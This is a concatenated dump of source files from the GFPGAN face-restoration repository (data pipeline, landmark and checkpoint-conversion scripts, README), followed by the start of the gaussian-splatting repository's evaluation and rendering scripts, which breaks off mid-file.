@staticmethod def color_jitter(img, shift): """jitter color: randomly jitter the RGB values, in numpy formats""" jitter_val = np.random.uniform(-shift, shift, 3).astype(np.float32) img = img + jitter_val img = np.clip(img, 0, 1) return img @staticmethod def color_jitter_pt(img, brightness, contrast, saturation, hue): """jitter color: randomly jitter the brightness, contrast, saturation, and hue, in torch Tensor formats""" fn_idx = torch.randperm(4) for fn_id in fn_idx: if fn_id == 0 and brightness is not None: brightness_factor = torch.tensor(1.0).uniform_(brightness[0], brightness[1]).item() img = adjust_brightness(img, brightness_factor) if fn_id == 1 and contrast is not None: contrast_factor = torch.tensor(1.0).uniform_(contrast[0], contrast[1]).item() img = adjust_contrast(img, contrast_factor) if fn_id == 2 and saturation is not None: saturation_factor = torch.tensor(1.0).uniform_(saturation[0], saturation[1]).item() img = adjust_saturation(img, saturation_factor) if fn_id == 3 and hue is not None: hue_factor = torch.tensor(1.0).uniform_(hue[0], hue[1]).item() img = adjust_hue(img, hue_factor) return img def get_component_coordinates(self, index, status): """Get facial component (left_eye, right_eye, mouth) coordinates from a pre-loaded pth file""" components_bbox = self.components_list[f'{index:08d}'] if status[0]: # hflip # exchange right and left eye tmp = components_bbox['left_eye'] components_bbox['left_eye'] = components_bbox['right_eye'] components_bbox['right_eye'] = tmp # modify the width coordinate components_bbox['left_eye'][0] = self.out_size - components_bbox['left_eye'][0] components_bbox['right_eye'][0] = self.out_size - components_bbox['right_eye'][0] components_bbox['mouth'][0] = self.out_size - components_bbox['mouth'][0] # get coordinates locations = [] for part in ['left_eye', 'right_eye', 'mouth']: mean = components_bbox[part][0:2] half_len = components_bbox[part][2] if 'eye' in part: half_len *= self.eye_enlarge_ratio loc = np.hstack((mean - half_len + 1, mean + half_len)) loc = torch.from_numpy(loc).float() locations.append(loc) return locations def __getitem__(self, index): if self.file_client is None: self.file_client = FileClient(self.io_backend_opt.pop('type'), **self.io_backend_opt) # load gt image # Shape: (h, w, c); channel order: BGR; image range: [0, 1], float32. 
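        # Descriptive note: the GT image loaded here is kept as the training
        # target, and a low-quality (LQ) input is synthesized from it further
        # below by: random mixed-kernel blur -> random downsampling -> optional
        # Gaussian noise -> optional JPEG compression -> resize back to (w, h)
        # -> optional color jitter / grayscale conversion.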
gt_path = self.paths[index] img_bytes = self.file_client.get(gt_path) img_gt = imfrombytes(img_bytes, float32=True) # random horizontal flip img_gt, status = augment(img_gt, hflip=self.opt['use_hflip'], rotation=False, return_status=True) h, w, _ = img_gt.shape # get facial component coordinates if self.crop_components: locations = self.get_component_coordinates(index, status) loc_left_eye, loc_right_eye, loc_mouth = locations # ------------------------ generate lq image ------------------------ # # blur kernel = degradations.random_mixed_kernels( self.kernel_list, self.kernel_prob, self.blur_kernel_size, self.blur_sigma, self.blur_sigma, [-math.pi, math.pi], noise_range=None) img_lq = cv2.filter2D(img_gt, -1, kernel) # downsample scale = np.random.uniform(self.downsample_range[0], self.downsample_range[1]) img_lq = cv2.resize(img_lq, (int(w // scale), int(h // scale)), interpolation=cv2.INTER_LINEAR) # noise if self.noise_range is not None: img_lq = degradations.random_add_gaussian_noise(img_lq, self.noise_range) # jpeg compression if self.jpeg_range is not None: img_lq = degradations.random_add_jpg_compression(img_lq, self.jpeg_range) # resize to original size img_lq = cv2.resize(img_lq, (w, h), interpolation=cv2.INTER_LINEAR) # random color jitter (only for lq) if self.color_jitter_prob is not None and (np.random.uniform() < self.color_jitter_prob): img_lq = self.color_jitter(img_lq, self.color_jitter_shift) # random to gray (only for lq) if self.gray_prob and np.random.uniform() < self.gray_prob: img_lq = cv2.cvtColor(img_lq, cv2.COLOR_BGR2GRAY) img_lq = np.tile(img_lq[:, :, None], [1, 1, 3]) if self.opt.get('gt_gray'): # whether convert GT to gray images img_gt = cv2.cvtColor(img_gt, cv2.COLOR_BGR2GRAY) img_gt = np.tile(img_gt[:, :, None], [1, 1, 3]) # repeat the color channels # BGR to RGB, HWC to CHW, numpy to tensor img_gt, img_lq = img2tensor([img_gt, img_lq], bgr2rgb=True, float32=True) # random color jitter (pytorch version) (only for lq) if self.color_jitter_pt_prob is not None and (np.random.uniform() < self.color_jitter_pt_prob): brightness = self.opt.get('brightness', (0.5, 1.5)) contrast = self.opt.get('contrast', (0.5, 1.5)) saturation = self.opt.get('saturation', (0, 1.5)) hue = self.opt.get('hue', (-0.1, 0.1)) img_lq = self.color_jitter_pt(img_lq, brightness, contrast, saturation, hue) # round and clip img_lq = torch.clamp((img_lq * 255.0).round(), 0, 255) / 255. 
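        # Descriptive note: the clamp/round above snaps the LQ tensor to 8-bit
        # levels in [0, 1], mimicking an image that was saved to disk, before
        # the normalization below.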
# normalize normalize(img_gt, self.mean, self.std, inplace=True) normalize(img_lq, self.mean, self.std, inplace=True) if self.crop_components: return_dict = { 'lq': img_lq, 'gt': img_gt, 'gt_path': gt_path, 'loc_left_eye': loc_left_eye, 'loc_right_eye': loc_right_eye, 'loc_mouth': loc_mouth } return return_dict else: return {'lq': img_lq, 'gt': img_gt, 'gt_path': gt_path} def __len__(self): return len(self.paths) File: gfpgan/data/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import dataset modules for registry # scan all the files that end with '_dataset.py' under the data folder data_folder = osp.dirname(osp.abspath(__file__)) dataset_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(data_folder) if v.endswith('_dataset.py')] # import all the dataset modules _dataset_modules = [importlib.import_module(f'gfpgan.data.{file_name}') for file_name in dataset_filenames] File: scripts/parse_landmark.py import cv2 import json import numpy as np import os import torch from basicsr.utils import FileClient, imfrombytes from collections import OrderedDict # ---------------------------- This script is used to parse facial landmarks ------------------------------------- # # Configurations save_img = False scale = 0.5 # 0.5 for official FFHQ (512x512), 1 for others enlarge_ratio = 1.4 # only for eyes json_path = 'ffhq-dataset-v2.json' face_path = 'datasets/ffhq/ffhq_512.lmdb' save_path = './FFHQ_eye_mouth_landmarks_512.pth' print('Load JSON metadata...') # use the official json file in FFHQ dataset with open(json_path, 'rb') as f: json_data = json.load(f, object_pairs_hook=OrderedDict) print('Open LMDB file...') # read ffhq images file_client = FileClient('lmdb', db_paths=face_path) with open(os.path.join(face_path, 'meta_info.txt')) as fin: paths = [line.split('.')[0] for line in fin] save_dict = {} for item_idx, item in enumerate(json_data.values()): print(f'\r{item_idx} / {len(json_data)}, {item["image"]["file_path"]} ', end='', flush=True) # parse landmarks lm = np.array(item['image']['face_landmarks']) lm = lm * scale item_dict = {} # get image if save_img: img_bytes = file_client.get(paths[item_idx]) img = imfrombytes(img_bytes, float32=True) # get landmarks for each component map_left_eye = list(range(36, 42)) map_right_eye = list(range(42, 48)) map_mouth = list(range(48, 68)) # eye_left mean_left_eye = np.mean(lm[map_left_eye], 0) # (x, y) half_len_left_eye = np.max((np.max(np.max(lm[map_left_eye], 0) - np.min(lm[map_left_eye], 0)) / 2, 16)) item_dict['left_eye'] = [mean_left_eye[0], mean_left_eye[1], half_len_left_eye] # mean_left_eye[0] = 512 - mean_left_eye[0] # for testing flip half_len_left_eye *= enlarge_ratio loc_left_eye = np.hstack((mean_left_eye - half_len_left_eye + 1, mean_left_eye + half_len_left_eye)).astype(int) if save_img: eye_left_img = img[loc_left_eye[1]:loc_left_eye[3], loc_left_eye[0]:loc_left_eye[2], :] cv2.imwrite(f'tmp/{item_idx:08d}_eye_left.png', eye_left_img * 255) # eye_right mean_right_eye = np.mean(lm[map_right_eye], 0) half_len_right_eye = np.max((np.max(np.max(lm[map_right_eye], 0) - np.min(lm[map_right_eye], 0)) / 2, 16)) item_dict['right_eye'] = [mean_right_eye[0], mean_right_eye[1], half_len_right_eye] # mean_right_eye[0] = 512 - mean_right_eye[0] # # for testing flip half_len_right_eye *= enlarge_ratio loc_right_eye = np.hstack( (mean_right_eye - half_len_right_eye + 1, mean_right_eye + half_len_right_eye)).astype(int) if save_img: eye_right_img = 
img[loc_right_eye[1]:loc_right_eye[3], loc_right_eye[0]:loc_right_eye[2], :] cv2.imwrite(f'tmp/{item_idx:08d}_eye_right.png', eye_right_img * 255) # mouth mean_mouth = np.mean(lm[map_mouth], 0) half_len_mouth = np.max((np.max(np.max(lm[map_mouth], 0) - np.min(lm[map_mouth], 0)) / 2, 16)) item_dict['mouth'] = [mean_mouth[0], mean_mouth[1], half_len_mouth] # mean_mouth[0] = 512 - mean_mouth[0] # for testing flip loc_mouth = np.hstack((mean_mouth - half_len_mouth + 1, mean_mouth + half_len_mouth)).astype(int) if save_img: mouth_img = img[loc_mouth[1]:loc_mouth[3], loc_mouth[0]:loc_mouth[2], :] cv2.imwrite(f'tmp/{item_idx:08d}_mouth.png', mouth_img * 255) save_dict[f'{item_idx:08d}'] = item_dict print('Save...') torch.save(save_dict, save_path) File: scripts/convert_gfpganv_to_clean.py import argparse import math import torch from gfpgan.archs.gfpganv1_clean_arch import GFPGANv1Clean def modify_checkpoint(checkpoint_bilinear, checkpoint_clean): for ori_k, ori_v in checkpoint_bilinear.items(): if 'stylegan_decoder' in ori_k: if 'style_mlp' in ori_k: # style_mlp_layers lr_mul = 0.01 prefix, name, idx, var = ori_k.split('.') idx = (int(idx) * 2) - 1 crt_k = f'{prefix}.{name}.{idx}.{var}' if var == 'weight': _, c_in = ori_v.size() scale = (1 / math.sqrt(c_in)) * lr_mul crt_v = ori_v * scale * 2**0.5 else: crt_v = ori_v * lr_mul * 2**0.5 checkpoint_clean[crt_k] = crt_v elif 'modulation' in ori_k: # modulation in StyleConv lr_mul = 1 crt_k = ori_k var = ori_k.split('.')[-1] if var == 'weight': _, c_in = ori_v.size() scale = (1 / math.sqrt(c_in)) * lr_mul crt_v = ori_v * scale else: crt_v = ori_v * lr_mul checkpoint_clean[crt_k] = crt_v elif 'style_conv' in ori_k: # StyleConv in style_conv1 and style_convs if 'activate' in ori_k: # FusedLeakyReLU # eg. style_conv1.activate.bias # eg. style_convs.13.activate.bias split_rlt = ori_k.split('.') if len(split_rlt) == 4: prefix, name, _, var = split_rlt crt_k = f'{prefix}.{name}.{var}' elif len(split_rlt) == 5: prefix, name, idx, _, var = split_rlt crt_k = f'{prefix}.{name}.{idx}.{var}' crt_v = ori_v * 2**0.5 # 2**0.5 used in FusedLeakyReLU c = crt_v.size(0) checkpoint_clean[crt_k] = crt_v.view(1, c, 1, 1) elif 'modulated_conv' in ori_k: # eg. style_conv1.modulated_conv.weight # eg. style_convs.13.modulated_conv.weight _, c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) crt_k = ori_k checkpoint_clean[crt_k] = ori_v * scale elif 'weight' in ori_k: crt_k = ori_k checkpoint_clean[crt_k] = ori_v * 2**0.5 elif 'to_rgb' in ori_k: # StyleConv in to_rgb1 and to_rgbs if 'modulated_conv' in ori_k: # eg. to_rgb1.modulated_conv.weight # eg. 
to_rgbs.5.modulated_conv.weight _, c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) crt_k = ori_k checkpoint_clean[crt_k] = ori_v * scale else: crt_k = ori_k checkpoint_clean[crt_k] = ori_v else: crt_k = ori_k checkpoint_clean[crt_k] = ori_v # end of 'stylegan_decoder' elif 'conv_body_first' in ori_k or 'final_conv' in ori_k: # key name name, _, var = ori_k.split('.') crt_k = f'{name}.{var}' # weight and bias if var == 'weight': c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale * 2**0.5 else: checkpoint_clean[crt_k] = ori_v * 2**0.5 elif 'conv_body' in ori_k: if 'conv_body_up' in ori_k: ori_k = ori_k.replace('conv2.weight', 'conv2.1.weight') ori_k = ori_k.replace('skip.weight', 'skip.1.weight') name1, idx1, name2, _, var = ori_k.split('.') crt_k = f'{name1}.{idx1}.{name2}.{var}' if name2 == 'skip': c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale / 2**0.5 else: if var == 'weight': c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale else: checkpoint_clean[crt_k] = ori_v if 'conv1' in ori_k: checkpoint_clean[crt_k] *= 2**0.5 elif 'toRGB' in ori_k: crt_k = ori_k if 'weight' in ori_k: c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale else: checkpoint_clean[crt_k] = ori_v elif 'final_linear' in ori_k: crt_k = ori_k if 'weight' in ori_k: _, c_in = ori_v.size() scale = 1 / math.sqrt(c_in) checkpoint_clean[crt_k] = ori_v * scale else: checkpoint_clean[crt_k] = ori_v elif 'condition' in ori_k: crt_k = ori_k if '0.weight' in ori_k: c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale * 2**0.5 elif '0.bias' in ori_k: checkpoint_clean[crt_k] = ori_v * 2**0.5 elif '2.weight' in ori_k: c_out, c_in, k1, k2 = ori_v.size() scale = 1 / math.sqrt(c_in * k1 * k2) checkpoint_clean[crt_k] = ori_v * scale elif '2.bias' in ori_k: checkpoint_clean[crt_k] = ori_v return checkpoint_clean if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--ori_path', type=str, help='Path to the original model') parser.add_argument('--narrow', type=float, default=1) parser.add_argument('--channel_multiplier', type=float, default=2) parser.add_argument('--save_path', type=str) args = parser.parse_args() ori_ckpt = torch.load(args.ori_path)['params_ema'] net = GFPGANv1Clean( 512, num_style_feat=512, channel_multiplier=args.channel_multiplier, decoder_load_path=None, fix_decoder=False, # for stylegan decoder num_mlp=8, input_is_latent=True, different_w=True, narrow=args.narrow, sft_half=True) crt_ckpt = net.state_dict() crt_ckpt = modify_checkpoint(ori_ckpt, crt_ckpt) print(f'Save to {args.save_path}.') torch.save(dict(params_ema=crt_ckpt), args.save_path, _use_new_zipfile_serialization=False)
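The following is a minimal sketch (not part of the repository) of loading a checkpoint produced by the conversion script above for a test forward pass. It assumes `GFPGANv1Clean` accepts the same constructor arguments used in `__main__` above and that its `forward` mirrors the `GFPGANBilinear.forward` signature shown earlier; the checkpoint path is illustrative.

import torch

from gfpgan.archs.gfpganv1_clean_arch import GFPGANv1Clean

net = GFPGANv1Clean(
    512, num_style_feat=512, channel_multiplier=2, decoder_load_path=None,
    fix_decoder=False, num_mlp=8, input_is_latent=True, different_w=True,
    narrow=1, sft_half=True)
# The conversion script saves the weights as dict(params_ema=...).
state_dict = torch.load('converted_clean.pth')['params_ema']  # illustrative path
net.load_state_dict(state_dict, strict=True)
net.eval()

with torch.no_grad():
    face = torch.randn(1, 3, 512, 512)        # stand-in for a normalized 512x512 face crop
    restored, _ = net(face, return_rgb=False)  # assumed to return (image, out_rgbs)
print(restored.shape)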
<p align="center"> <img src="assets/gfpgan_logo.png" height=130> </p> ## <div align="center"><b><a href="README.md">English</a> | <a href="README_CN.md">简体中文</a></b></div> <div align="center"> <!-- <a href="https://twitter.com/_Xintao_" style="text-decoration:none;"> <img src="https://user-images.githubusercontent.com/17445847/187162058-c764ced6-952f-404b-ac85-ba95cce18e7b.png" width="4%" alt="" /> </a> --> [![download](https://img.shields.io/github/downloads/TencentARC/GFPGAN/total.svg)](https://github.com/TencentARC/GFPGAN/releases) [![PyPI](https://img.shields.io/pypi/v/gfpgan)](https://pypi.org/project/gfpgan/) [![Open issue](https://img.shields.io/github/issues/TencentARC/GFPGAN)](https://github.com/TencentARC/GFPGAN/issues) [![Closed issue](https://img.shields.io/github/issues-closed/TencentARC/GFPGAN)](https://github.com/TencentARC/GFPGAN/issues) [![LICENSE](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/TencentARC/GFPGAN/blob/master/LICENSE) [![python lint](https://github.com/TencentARC/GFPGAN/actions/workflows/pylint.yml/badge.svg)](https://github.com/TencentARC/GFPGAN/blob/master/.github/workflows/pylint.yml) [![Publish-pip](https://github.com/TencentARC/GFPGAN/actions/workflows/publish-pip.yml/badge.svg)](https://github.com/TencentARC/GFPGAN/blob/master/.github/workflows/publish-pip.yml) </div> 1. :boom: **Updated** online demo: [![Replicate](https://img.shields.io/static/v1?label=Demo&message=Replicate&color=blue)](https://replicate.com/tencentarc/gfpgan). Here is the [backup](https://replicate.com/xinntao/gfpgan). 1. :boom: **Updated** online demo: [![Huggingface Gradio](https://img.shields.io/static/v1?label=Demo&message=Huggingface%20Gradio&color=orange)](https://huggingface.co/spaces/Xintao/GFPGAN) 1. [Colab Demo](https://colab.research.google.com/drive/1sVsoBd9AjckIXThgtZhGrHRfFI6UUYOo) for GFPGAN <a href="https://colab.research.google.com/drive/1sVsoBd9AjckIXThgtZhGrHRfFI6UUYOo"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="google colab logo"></a>; (Another [Colab Demo](https://colab.research.google.com/drive/1Oa1WwKB4M4l1GmR7CtswDVgOCOeSLChA?usp=sharing) for the original paper model) <!-- 3. Online demo: [Replicate.ai](https://replicate.com/xinntao/gfpgan) (may need to sign in, return the whole image) 4. Online demo: [Baseten.co](https://app.baseten.co/applications/Q04Lz0d/operator_views/8qZG6Bg) (backed by GPU, returns the whole image) 5. We provide a *clean* version of GFPGAN, which can run without CUDA extensions. So that it can run in **Windows** or on **CPU mode**. --> > :rocket: **Thanks for your interest in our work. You may also want to check our new updates on the *tiny models* for *anime images and videos* in [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN/blob/master/docs/anime_video_model.md)** :blush: GFPGAN aims at developing a **Practical Algorithm for Real-world Face Restoration**.<br> It leverages rich and diverse priors encapsulated in a pretrained face GAN (*e.g.*, StyleGAN2) for blind face restoration. :question: Frequently Asked Questions can be found in [FAQ.md](FAQ.md). :triangular_flag_on_post: **Updates** - :white_check_mark: Add [RestoreFormer](https://github.com/wzhouxiff/RestoreFormer) inference codes. - :white_check_mark: Add [V1.4 model](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth), which produces slightly more details and better identity than V1.3. 
- :white_check_mark: Add **[V1.3 model](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth)**, which produces **more natural** restoration results, and better results on *very low-quality* / *high-quality* inputs. See more in [Model zoo](#european_castle-model-zoo), [Comparisons.md](Comparisons.md) - :white_check_mark: Integrated to [Huggingface Spaces](https://huggingface.co/spaces) with [Gradio](https://github.com/gradio-app/gradio). See [Gradio Web Demo](https://huggingface.co/spaces/akhaliq/GFPGAN). - :white_check_mark: Support enhancing non-face regions (background) with [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN). - :white_check_mark: We provide a *clean* version of GFPGAN, which does not require CUDA extensions. - :white_check_mark: We provide an updated model without colorizing faces. --- If GFPGAN is helpful in your photos/projects, please help to :star: this repo or recommend it to your friends. Thanks:blush: Other recommended projects:<br> :arrow_forward: [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN): A practical algorithm for general image restoration<br> :arrow_forward: [BasicSR](https://github.com/xinntao/BasicSR): An open-source image and video restoration toolbox<br> :arrow_forward: [facexlib](https://github.com/xinntao/facexlib): A collection that provides useful face-relation functions<br> :arrow_forward: [HandyView](https://github.com/xinntao/HandyView): A PyQt5-based image viewer that is handy for view and comparison<br> --- ### :book: GFP-GAN: Towards Real-World Blind Face Restoration with Generative Facial Prior > [[Paper](https://arxiv.org/abs/2101.04061)] &emsp; [[Project Page](https://xinntao.github.io/projects/gfpgan)] &emsp; [Demo] <br> > [Xintao Wang](https://xinntao.github.io/), [Yu Li](https://yu-li.github.io/), [Honglun Zhang](https://scholar.google.com/citations?hl=en&user=KjQLROoAAAAJ), [Ying Shan](https://scholar.google.com/citations?user=4oXBp9UAAAAJ&hl=en) <br> > Applied Research Center (ARC), Tencent PCG <p align="center"> <img src="https://xinntao.github.io/projects/GFPGAN_src/gfpgan_teaser.jpg"> </p> --- ## :wrench: Dependencies and Installation - Python >= 3.7 (Recommend to use [Anaconda](https://www.anaconda.com/download/#linux) or [Miniconda](https://docs.conda.io/en/latest/miniconda.html)) - [PyTorch >= 1.7](https://pytorch.org/) - Option: NVIDIA GPU + [CUDA](https://developer.nvidia.com/cuda-downloads) - Option: Linux ### Installation We now provide a *clean* version of GFPGAN, which does not require customized CUDA extensions. <br> If you want to use the original model in our paper, please see [PaperModel.md](PaperModel.md) for installation. 1. Clone repo ```bash git clone https://github.com/TencentARC/GFPGAN.git cd GFPGAN ``` 1. Install dependent packages ```bash # Install basicsr - https://github.com/xinntao/BasicSR # We use BasicSR for both training and inference pip install basicsr # Install facexlib - https://github.com/xinntao/facexlib # We use face detection and face restoration helper in the facexlib package pip install facexlib pip install -r requirements.txt python setup.py develop # If you want to enhance the background (non-face) regions with Real-ESRGAN, # you also need to install the realesrgan package pip install realesrgan ``` ## :zap: Quick Inference We take the v1.3 version for an example. More models can be found [here](#european_castle-model-zoo). 
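Besides the command-line script shown below, the pip-installed `gfpgan` package exposes a `GFPGANer` helper that can be called from Python. The sketch below is illustrative rather than authoritative (the argument names and example paths should be checked against `inference_gfpgan.py` and `gfpgan/utils.py`), and it assumes the V1.3 model has already been downloaded as described next.

```python
import cv2
from gfpgan import GFPGANer

restorer = GFPGANer(
    model_path='experiments/pretrained_models/GFPGANv1.3.pth',
    upscale=2,
    arch='clean',
    channel_multiplier=2,
    bg_upsampler=None)  # pass a RealESRGANer instance to also enhance backgrounds

img = cv2.imread('inputs/whole_imgs/00.jpg', cv2.IMREAD_COLOR)  # illustrative input
cropped_faces, restored_faces, restored_img = restorer.enhance(
    img, has_aligned=False, only_center_face=False, paste_back=True)
cv2.imwrite('results/restored.png', restored_img)
```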
Download pre-trained models: [GFPGANv1.3.pth](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth) ```bash wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth -P experiments/pretrained_models ``` **Inference!** ```bash python inference_gfpgan.py -i inputs/whole_imgs -o results -v 1.3 -s 2 ``` ```console Usage: python inference_gfpgan.py -i inputs/whole_imgs -o results -v 1.3 -s 2 [options]... -h show this help -i input Input image or folder. Default: inputs/whole_imgs -o output Output folder. Default: results -v version GFPGAN model version. Option: 1 | 1.2 | 1.3. Default: 1.3 -s upscale The final upsampling scale of the image. Default: 2 -bg_upsampler background upsampler. Default: realesrgan -bg_tile Tile size for background sampler, 0 for no tile during testing. Default: 400 -suffix Suffix of the restored faces -only_center_face Only restore the center face -aligned Input are aligned faces -ext Image extension. Options: auto | jpg | png, auto means using the same extension as inputs. Default: auto ``` If you want to use the original model in our paper, please see [PaperModel.md](PaperModel.md) for installation and inference. ## :european_castle: Model Zoo | Version | Model Name | Description | | :---: | :---: | :---: | | V1.3 | [GFPGANv1.3.pth](https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth) | Based on V1.2; **more natural** restoration results; better results on very low-quality / high-quality inputs. | | V1.2 | [GFPGANCleanv1-NoCE-C2.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth) | No colorization; no CUDA extensions are required. Trained with more data with pre-processing. | | V1 | [GFPGANv1.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/GFPGANv1.pth) | The paper model, with colorization. | The comparisons are in [Comparisons.md](Comparisons.md). Note that V1.3 is not always better than V1.2. You may need to select different models based on your purpose and inputs. | Version | Strengths | Weaknesses | | :---: | :---: | :---: | |V1.3 | ✓ natural outputs<br> ✓better results on very low-quality inputs <br> ✓ work on relatively high-quality inputs <br>✓ can have repeated (twice) restorations | ✗ not very sharp <br> ✗ have a slight change on identity | |V1.2 | ✓ sharper output <br> ✓ with beauty makeup | ✗ some outputs are unnatural | You can find **more models (such as the discriminators)** here: [[Google Drive](https://drive.google.com/drive/folders/17rLiFzcUMoQuhLnptDsKolegHWwJOnHu?usp=sharing)], OR [[Tencent Cloud 腾讯微云](https://share.weiyun.com/ShYoCCoc)] ## :computer: Training We provide the training codes for GFPGAN (used in our paper). <br> You could improve it according to your own needs. **Tips** 1. More high quality faces can improve the restoration quality. 2. You may need to perform some pre-processing, such as beauty makeup. **Procedures** (You can try a simple version ( `options/train_gfpgan_v1_simple.yml`) that does not require face component landmarks.) 1. Dataset preparation: [FFHQ](https://github.com/NVlabs/ffhq-dataset) 1. Download pre-trained models and other data. Put them in the `experiments/pretrained_models` folder. 1. [Pre-trained StyleGAN2 model: StyleGAN2_512_Cmul1_FFHQ_B12G4_scratch_800k.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/StyleGAN2_512_Cmul1_FFHQ_B12G4_scratch_800k.pth) 1. 
[Component locations of FFHQ: FFHQ_eye_mouth_landmarks_512.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/FFHQ_eye_mouth_landmarks_512.pth) 1. [A simple ArcFace model: arcface_resnet18.pth](https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/arcface_resnet18.pth) 1. Modify the configuration file `options/train_gfpgan_v1.yml` accordingly. 1. Training > python -m torch.distributed.launch --nproc_per_node=4 --master_port=22021 gfpgan/train.py -opt options/train_gfpgan_v1.yml --launcher pytorch ## :scroll: License and Acknowledgement GFPGAN is released under Apache License Version 2.0. ## BibTeX @InProceedings{wang2021gfpgan, author = {Xintao Wang and Yu Li and Honglun Zhang and Ying Shan}, title = {Towards Real-World Blind Face Restoration with Generative Facial Prior}, booktitle={The IEEE Conference on Computer Vision and Pattern Recognition (CVPR)}, year = {2021} } ## :e-mail: Contact If you have any question, please email `[email protected]` or `[email protected]`.
gaussian-splatting
8a70a8cd6f0d9c0a14f564844ead2d1147d5a7ac
File: metrics.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from pathlib import Path import os from PIL import Image import torch import torchvision.transforms.functional as tf from utils.loss_utils import ssim from lpipsPyTorch import lpips import json from tqdm import tqdm from utils.image_utils import psnr from argparse import ArgumentParser def readImages(renders_dir, gt_dir): renders = [] gts = [] image_names = [] for fname in os.listdir(renders_dir): render = Image.open(renders_dir / fname) gt = Image.open(gt_dir / fname) renders.append(tf.to_tensor(render).unsqueeze(0)[:, :3, :, :].cuda()) gts.append(tf.to_tensor(gt).unsqueeze(0)[:, :3, :, :].cuda()) image_names.append(fname) return renders, gts, image_names def evaluate(model_paths): full_dict = {} per_view_dict = {} full_dict_polytopeonly = {} per_view_dict_polytopeonly = {} print("") for scene_dir in model_paths: try: print("Scene:", scene_dir) full_dict[scene_dir] = {} per_view_dict[scene_dir] = {} full_dict_polytopeonly[scene_dir] = {} per_view_dict_polytopeonly[scene_dir] = {} test_dir = Path(scene_dir) / "test" for method in os.listdir(test_dir): print("Method:", method) full_dict[scene_dir][method] = {} per_view_dict[scene_dir][method] = {} full_dict_polytopeonly[scene_dir][method] = {} per_view_dict_polytopeonly[scene_dir][method] = {} method_dir = test_dir / method gt_dir = method_dir/ "gt" renders_dir = method_dir / "renders" renders, gts, image_names = readImages(renders_dir, gt_dir) ssims = [] psnrs = [] lpipss = [] for idx in tqdm(range(len(renders)), desc="Metric evaluation progress"): ssims.append(ssim(renders[idx], gts[idx])) psnrs.append(psnr(renders[idx], gts[idx])) lpipss.append(lpips(renders[idx], gts[idx], net_type='vgg')) print(" SSIM : {:>12.7f}".format(torch.tensor(ssims).mean(), ".5")) print(" PSNR : {:>12.7f}".format(torch.tensor(psnrs).mean(), ".5")) print(" LPIPS: {:>12.7f}".format(torch.tensor(lpipss).mean(), ".5")) print("") full_dict[scene_dir][method].update({"SSIM": torch.tensor(ssims).mean().item(), "PSNR": torch.tensor(psnrs).mean().item(), "LPIPS": torch.tensor(lpipss).mean().item()}) per_view_dict[scene_dir][method].update({"SSIM": {name: ssim for ssim, name in zip(torch.tensor(ssims).tolist(), image_names)}, "PSNR": {name: psnr for psnr, name in zip(torch.tensor(psnrs).tolist(), image_names)}, "LPIPS": {name: lp for lp, name in zip(torch.tensor(lpipss).tolist(), image_names)}}) with open(scene_dir + "/results.json", 'w') as fp: json.dump(full_dict[scene_dir], fp, indent=True) with open(scene_dir + "/per_view.json", 'w') as fp: json.dump(per_view_dict[scene_dir], fp, indent=True) except: print("Unable to compute metrics for model", scene_dir) if __name__ == "__main__": device = torch.device("cuda:0") torch.cuda.set_device(device) # Set up command line argument parser parser = ArgumentParser(description="Training script parameters") parser.add_argument('--model_paths', '-m', required=True, nargs="+", type=str, default=[]) args = parser.parse_args() evaluate(args.model_paths) File: render.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch from scene import Scene import os from tqdm import tqdm from os import makedirs from gaussian_renderer import render import torchvision from utils.general_utils import safe_state from argparse import ArgumentParser from arguments import ModelParams, PipelineParams, get_combined_args from gaussian_renderer import GaussianModel def render_set(model_path, name, iteration, views, gaussians, pipeline, background): render_path = os.path.join(model_path, name, "ours_{}".format(iteration), "renders") gts_path = os.path.join(model_path, name, "ours_{}".format(iteration), "gt") makedirs(render_path, exist_ok=True) makedirs(gts_path, exist_ok=True) for idx, view in enumerate(tqdm(views, desc="Rendering progress")): rendering = render(view, gaussians, pipeline, background)["render"] gt = view.original_image[0:3, :, :] torchvision.utils.save_image(rendering, os.path.join(render_path, '{0:05d}'.format(idx) + ".png")) torchvision.utils.save_image(gt, os.path.join(gts_path, '{0:05d}'.format(idx) + ".png")) def render_sets(dataset : ModelParams, iteration : int, pipeline : PipelineParams, 